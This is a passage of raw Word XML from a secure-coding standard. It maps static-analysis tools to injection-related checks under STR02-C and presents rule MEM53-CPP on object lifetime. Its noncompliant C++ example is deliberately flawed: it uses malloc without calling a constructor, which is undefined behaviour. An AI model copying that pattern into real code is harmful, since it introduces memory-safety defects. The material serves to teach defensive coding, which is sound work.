          <w:p w14:paraId="6CDF17A4" w14:textId="22163967" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="459AD35B" w14:textId="58620B2B" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">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A3C43" w14:paraId="4AE2E526" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D423C47" w14:textId="07424B8A" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId29" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="510F5ED6" w14:textId="04C2CA97" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55B618EC" w14:textId="74D90ACF" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId30" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>NNTS.TAINTED</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId31" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>SV.TAINTED.INJECTION</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E70620" w14:textId="4580AC32" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="631335FB" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7DAF61" w14:textId="5DE5609E" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId32" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59BE0E81" w14:textId="159F525A" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3F44DA" w14:textId="1E18FE81" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>108 D, 109 D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75413ECD" w14:textId="501799FF" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="53A16CAB" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="730AD398" w14:textId="0A481FCD" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId33"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01646044" w14:textId="5EFD6AB5" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CDAF81" w14:textId="29B109B4" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>CERT_C-STR02-a</w:t>
            </w:r>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
              <w:t>CERT_C-STR02-b</w:t>
            </w:r>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
              <w:t>CERT_C-STR02-c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D28E14" w14:textId="059902BC" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Protect against command injection</w:t>
            </w:r>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
              <w:t>Protect against file name injection</w:t>
            </w:r>
            <w:r w:rsidRPr="001A3C43">
              <w:br/>
              <w:t>Protect against SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="3116DC25" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D2ADAE" w14:textId="63415808" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId34" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175DCE5F" w14:textId="5C31C3F3" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>R2021a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BE6BF3D" w14:textId="77777777" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId35" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CERT C: Rec. STR02-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="04C2C431" w14:textId="7C372DD8" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB085F4" w14:textId="77777777" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Checks for:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710FB64F" w14:textId="77777777" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Execution of externally controlled command</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D1D848" w14:textId="77777777" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Command executed from externally controlled path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47630511" w14:textId="77777777" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Library loaded from externally controlled path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EED4FB0" w14:textId="3CC63EE3" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Rec. partially covered.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785A75F" w:rsidR="00381847" w:rsidRDefault="00CE3AA7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Explicitly construct and destruct objects when manually managing object lifetime</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4556774" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00CE3AA7">
              <w:t>MEM</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00CE3AA7">
              <w:t>053</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00CE3AA7">
              <w:t>CPP</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="76F8F206" w14:textId="0164BAFC" w:rsidR="00381847" w:rsidRDefault="00CE3AA7">
            <w:r>
              <w:t>When not using the new operator to allocate sufficient memory, memory is thought to be manually managed (the lifetime of the object) and should be deallocated and destroyed in the same manual manner. An object used outside of its lifespan is undefined behavior and can lead to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2C6B613" w:rsidR="00F72634" w:rsidRDefault="00CE3AA7" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">A manual management of memory is </w:t>
            </w:r>
            <w:r w:rsidR="00D14250">
              <w:t xml:space="preserve">occurring, due to the user provided construction, with a call to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00D14250">
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D14250">
              <w:t>malloc(). The constructor for the object is never called, and this results in undefined behavior, when the class is accessed later by s-&gt;f().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="3267071A" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25864E41"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#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>cstdlib</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C74CF55"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Fonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1842C0CE"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struct</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>S {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53EB58E8"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S(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="06BE8D5C"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5741A410"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void</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0C3FE902"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ADABA7C"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Fonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0430E8D7"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void</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>g() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63611FA6"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S *s = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>static_cast</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;S *&gt;(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>malloc</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(S)));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20080F34"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="703C06F1"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s-&gt;f(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="49E34F93"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30709657"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w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>free</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(s);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4D0934" w14:textId="5BA04C7E" w:rsidR="00F72634" w:rsidRDefault="00CE3AA7" w:rsidP="00CE3AA7">
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>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1FA35E" w:rsidR="00F72634" w:rsidRDefault="00D14250" w:rsidP="0015146B">
            <w:r>
              <w:t>The constructor and destructor are both explicitly called.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="7A1A78A0" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AC3E78B"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#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>cstdlib</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1896700D"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#include &lt;new&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E55712C"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE385A5"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struct S {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498ACA8E"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S(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6C898B97"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73BD102C"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void f(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="37224C9D"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39E1FAC7"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5E72AB"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lastRenderedPageBreak/>
              <w:t>void g() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B61E3D0"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void *</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ptr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
